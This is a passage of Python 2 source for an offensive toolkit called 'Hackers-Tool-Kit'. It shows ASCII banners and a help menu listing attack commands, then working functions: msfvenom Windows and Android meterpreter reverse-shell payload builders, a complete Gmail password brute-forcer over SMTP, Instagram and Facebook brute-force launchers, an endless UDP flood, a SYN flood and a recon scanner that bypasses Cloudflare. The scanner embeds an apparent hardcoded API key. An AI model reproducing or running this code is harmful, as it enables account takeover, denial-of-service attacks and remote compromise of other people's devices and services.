██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner15(): - print """\033[93m - __ _ - _wr"" "-q__ - _dP 9m_ - _#P 9#_ - d#@ \033[92mtype ? for help\033[93m 9#m - d## ### - J### ###L - {###K J###K - ]####K ___aaa___ J####F - __gmM######_ w#P"" ""9#m _d#####Mmw__ - _g##############mZ_ __g##############m_ - _d####M@PPPP@@M#######Mmp gm#########@@PPP9@M####m_ - a###"" ,Z"#####@" '######"\g ""M##m - J#@" 0L "*## ##@" J# *#K - #" `# "_gmwgm_~ dF `#_ -7F "#_ ]#####F _dK JE -] *m__ ##### __g@" F - \033[92m@tuf_unkn0wn\033[93m "PJ#####LP" \033[92mhackers-tool-kit\033[93m - ` 0######_ ' - _0########_ - . _d#####^#####m__ , - "*w_________am#####P" ~9#####mw_________w*" - ""9@#####@M"" ""P@#####@M"" -\033[92m - ██░ ██ ▄▄▄█████▓ ██ ▄█▀ - ▓██░ ██▒▓ ██▒ ▓▒ ██▄█▒ - ▒██▀▀██░▒ ▓██░ ▒░▓███▄░ - ░▓█ ░██ ░ ▓██▓ ░ ▓██ █▄ - ░▓█▒░██▓ ▒██▒ ░ ▒██▒ █▄ - ▒ ░░▒░▒ ▒ ░░ ▒ ▒▒ ▓▒ - ▒ ░▒░ ░ ░ ░ ░▒ ▒░ - ░ ░░ ░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░\033[0m - """.decode('utf-8') -def mainbanner16(): - print """\033[91m - :PB@Bk: - ,jB@@B@B@B@BBL. - 7G@B@B@BMMMMMB@B@B@Nr - :kB@B@@@MMOMOMOMOMMMM@B@B@B1, - :5@B@B@B@BBMMOMOMOMOMOMOMM@@@B@B@BBu. - 70@@@B@B@B@BXBBOMOMOMOMOMOMMBMPB@B@B@B@B@Nr - G@@@BJ iB@B@@ OBMOMOMOMOMOMOM@2 B@B@B. EB@B@S - @@BM@GJBU. iSuB@OMOMOMOMOMOMM@OU1: .kBLM@M@B@ - B@MMB@B 7@BBMMOMOMOMOMOBB@: B@BMM@B - @@@B@B 7@@@MMOMOMOMM@B@: @@B@B@ - @@OLB. BNB@MMOMOMM@BEB rBjM@B - @@ @ M OBOMOMM@q M .@ @@ - @@OvB B:u@MMO\033[31mMOMMBJiB .BvM@B - @B@B@J 0@B@MMOMOMOMB@B@u q@@@B@ - B@MBB@v G@@BMMMMMMMMMMMBB@5 F@BMM@B - @BBM@BPNi LMEB@OMMMM@B@MMOMM@BZM7 rEqB@MBB@ - B@@@BM B@B@B qBMOMB@B@B@BMOMBL B@B@B @B@B@M - J@@@@PB@B@B@B7G@OMBB. ,@MMM@qLB@B@@@BqB@BBv - iGB@,i0@M@B@MMO@E : M@OMM@@@B@Pii@@N: - . B@M@B@MMM@B@B@B@MMM@@@M@B - @B@B.i@MBB@B@B@@BM@::B@B@ - B@@@ .B@B.:@B@ :B@B @B@O - :0 r@B@ B@@ .@B@: P: - vMB :@B@ :BO7 - ,B@B\033[0m - - \033[32m╔═══\033[93m+\033[0mHackers-Tool-Kit\033[93m+\033[32m════╗\033[0m - ███████████████████████████ - type █?█ for help - ███ - \033[31m▄▄ ▄▄ \033[0m███\033[31m ▄▄ ▄▄▄ - ██ ██ \033[0m███\033[31m ██ ██▀ - ██ ██ \033[0m███\033[31m ██▄██ - ████████ \033[0m███\033[31m █████ - ██ ██ \033[0m███\033[31m ██ ██▄ - ██ ██ \033[0m███\033[31m ██ ██▄ - ▀▀ ▀▀ \033[0m▀▀▀\033[31m ▀▀ ▀▀\033[0m - """.decode('utf-8') -def mainbanner17(): - print """ - - .---. - |---| - type |-\033[32m?\033[0m-| for help - |---| - .---^ - ^---. - :___________: - \033[31m▄█ █▄\033[0m | |//| \033[32m▄█ ▄█▄\033[0m - ███ ███ | |//| ███ ▄███▀ - ███ ███ | |//| ███▐██▀ - ███▄▄▄▄███ | |//| █████▀ - ███▀▀▀▀███ | |//| █████▄ - ███ ███ | |//| ███▐██▄ - ███ ███ | |.-| ███ ▀███▄ - \033[31m███ ███\033[0m |.-'**| \033[32m███ ▀█▀\033[0m - \***/ - \*\033[91m/\033[31m - V\033[0m - """.decode('utf-8') -def mainbanner18(): - print """ - Type \033[31m?\033[0m For\033[31m Help\033[0m -\033[31m╔═══╗ ╔═══╗ ╔═════════════════════╗ ╔═══╗ ╔═══╗ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m║ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔═╝\033[0mHTK\033[31m╔╝ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ╚════════╗\033[0mHTK\033[31m╔════════╝ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m╔═╝ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║╔╝\033[0mHTK\033[31m╔╝ -║\033[0mHTK\033[31m╚═══════════╝\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m╚╝\033[0mHTK\033[31m╔╝ -║\033[0mHTKHHHHHHHHHHHHHHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK HTK\033[31m╔╝ -║\033[0mHTKTTTTTTTTTTTTTHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTK \033[31m╚╗\033[0m -║\033[31mHTKKKKKKKKKKKKKKHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m╔╗\033[31mHTK\033[0m╚═╗ -║\033[31mHTK\033[0m╔═══════════╗\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║╚═╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m║ -╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ - """.decode('utf-8') -def mainbanner19(): - print """\033[31m - # # - # # - %# \033[0m@tuf_unkn0wn\033[31m ## - ,%/ /%, - %## ##% - &%## ##%& - ,%%#####/. ,/#####%%, - %&%%#####/ \033[0m████\033[31m /#####%%&% - .&&%%%&& \033[0m████\033[31m &&%%%&&. - /&%( \033[0m████\033[31m (%&( - \033[0m████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - \033[31m██████\033[31m type \033[0m█\033[31m??\033[0m█ \033[31mfor help ██████ -██ \033[0m██████████████████████████████\033[31m ██ -███████ \033[0m██████████████████████████████\033[31m ███████ -██ ██ \033[0m████ \033[31m ██ ██ - ██████ \033[0m████ \033[31m ██████ - ▒ ▓▒ ▒ ▒ ▓▒ ▒ - ░ ▒ ░ ██████ ░ ▒ ░ - ░ ░ ██ ░ ░ - ███████ - ██ ██ - ██████ - ▒ ▓▒ ▒ - ░ ▒ ░ - ░ ░\033[0m - """.decode('utf-8') -def mainbanner20(): - print """ - - - ██╗\033[31m██╗ ██╗\033[0m██╗ ██╗\033[92m████████╗\033[0m██╗ ██╗\033[34m██╗ ██╗\033[0m██╗ - ██╔╝\033[31m██║ \033[31m██║\033[0m╚██╗ ██╔╝\033[92m╚══\033[92m██╔══╝\033[0m╚██╗ ██╔╝\033[34m██║ ██╔╝\033[0m╚██╗ -██╔╝ \033[31m███████║ \033[0m╚██╗██╔╝\033[92m ██║ \033[0m╚██╗██╔╝\033[34m █████╔╝ \033[0m╚██╗ -╚██╗ \033[31m██╔══██║ \033[0m██╔╝╚██╗ \033[92m██║ \033[0m ██╔╝╚██╗\033[34m ██╔═██╗\033[0m ██╔╝ - ╚██╗\033[31m██║ ██║\033[0m██╔╝ ╚██╗\033[92m ██║ \033[0m ██╔╝ ╚██╗\033[34m██║ ██╗\033[0m██╔╝ - ╚═╝\033[31m╚═╝ ╚═╝\033[0m╚═╝ ╚═╝\033[92m ╚═╝ \033[0m ╚═╝ ╚═╝\033[34m╚═╝ ╚═╝\033[0m╚═╝ - Created by @tuf_unkn0wn type ? for help - - """.decode('utf-8') -def mainbanner21(): - os.system("cat /root/hackers-tool-kit/tools/venombanner.txt") - - -def mainbanner(): - import random - for x in range(10): - num = random.randint(1,21) - if num == 1: - mainbanner1() - if num == 2: - mainbanner2() - if num == 3: - mainbanner3() - if num == 4: - mainbanner4() - if num == 5: - mainbanner5() - if num == 6: - mainbanner6() - if num == 7: - mainbanner7() - if num == 8: - mainbanner8() - if num == 9: - mainbanner9() - if num == 10: - mainbanner10() - if num == 11: - mainbanner11() - if num == 12: - mainbanner12() - if num == 13: - mainbanner13() - if num == 14: - mainbanner14() - if num == 15: - mainbanner15() - if num == 16: - mainbanner16() - if num == 17: - mainbanner17() - if num == 18: - mainbanner18() - if num == 19: - mainbanner19() - if num == 20: - mainbanner20() - if num == 21: - mainbanner21() -#--------------------------# -#MAIN STARTING BANNER END# - - -#HELP BANNER START# -#-----------------# -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -? : displays this message -update : update the hackers-tool-kit -clear : clears screen -banner : clears screen and shows new banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -aircrack: aircrack-ng automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arpspoof: arp spoofing | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -terminal: open another new terminal -source : get source code from a website -dirscan : web directory scanner / bruteforce -aserver : start a apache server -run : run a file -phpload : make a php reverse_tcp payload and start it in a multi handler -pyload : make a python reverse_tcp payload and start it in a multi handler -foxhis : gather firefox history from privileged javascript shell -rhawk : run the RED_HAWK script (info gathering tool) -nano : open nano text editor -compilec: compile a c file -dnsspoof: dns spoofing [type dnsspoofall to spoof entire subnet] -\033[91m---------------------------------------------------------------------------------\033[0m - """ -#-----------------# -#HELP BANNER END# - - -#WINDOWS REVERSE TCP PAYLOAD START# -#---------------------------------# -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#WINDOWS REVERSE TCP PAYLOAD END# - - -#ANDROID REVERSE TCP PAYLOAD START# -#---------------------------------# -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#ANDROID REVERSE TCP PAYLOAD END# - -#GMAIL BRUTEFORCE START# -#----------------------# -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -#--------------------# -#GMAIL BRUTEFORCE END# - -#PORT SCAN START# -#---------------# -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -#-------------# -#PORT SCAN END# - -#INSTAGRAM BRUTEFORCE START# -#--------------------------# -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - print "\033[1m\033[33m\nMODES>: [0] fastest, [1] fast, [2] slow, [3] slowest\033[0m\n" - k = raw_input("MODE> ") - ma = 'python3 /root/hackers-tool-kit/tools/Instagram/instagram.py {0} {1} -m {2}'.format(insta,jl,k) - os.system(ma) -#------------------------# -#INSTAGRAM BRUTEFORCE END# - -#FACEBOOK BRUTEFORCE START# -#-------------------------# -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -#-----------------------# -#FACEBOOK BRUTEFORCE END# - -#HOST TO IP START# -#----------------# -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -#--------------# -#HOST TO IP END# - -#YOUR OWN IP START# -#-----------------# -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" -#---------------# -#YOUR OWN IP END# - - -#AUTOMATED WIFI HACK START# -#-------------------------# -def wifite(): - os.system("wifite") -#-----------------------# -#AUTOMATED WIFI HACK END# - - -#MONITOR MODE START# -#------------------# -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -#----------------# -#MONITOR MODE END# - - -#DEVICES IN THE NET START# -#------------------------# -def netdev(): - os.system("netdiscover") -#----------------------# -#DEVICES IN THE NET END# - - -#NETS AROUND YOU START# -#-----------------------# -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -#---------------------# -#NETS AROUND YOU END# - - -#INFO SCAN HOST START# -#--------------------# -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -#------------------# -#INFO SCAN HOST END# - - -#INFO ON YOUR SYSTEM START# -#-------------------------# -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - print "\n" - os.system("iwconfig") - print "\n" - os.system("neofetch") - print "\n" - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" - print "\n" - show = 'macchanger -s {0}'.format(k) - os.system(show) -#-----------------------# -#INFO ON YOUR SYSTEM END# - - -#ALL METASPLOIT EXPLOITS START# -#-----------------------------# -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -#---------------------------# -#ALL METASPLOIT EXPLOITS END# - - -#UDP DOS START# -#-------------# -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -#-----------# -#UDP DOS END# - -#TCP FLOOD START# -#---------------# -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -#-------------# -#TCP FLOOD END# - - -#SYN FLOOD START# -#---------------# -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets 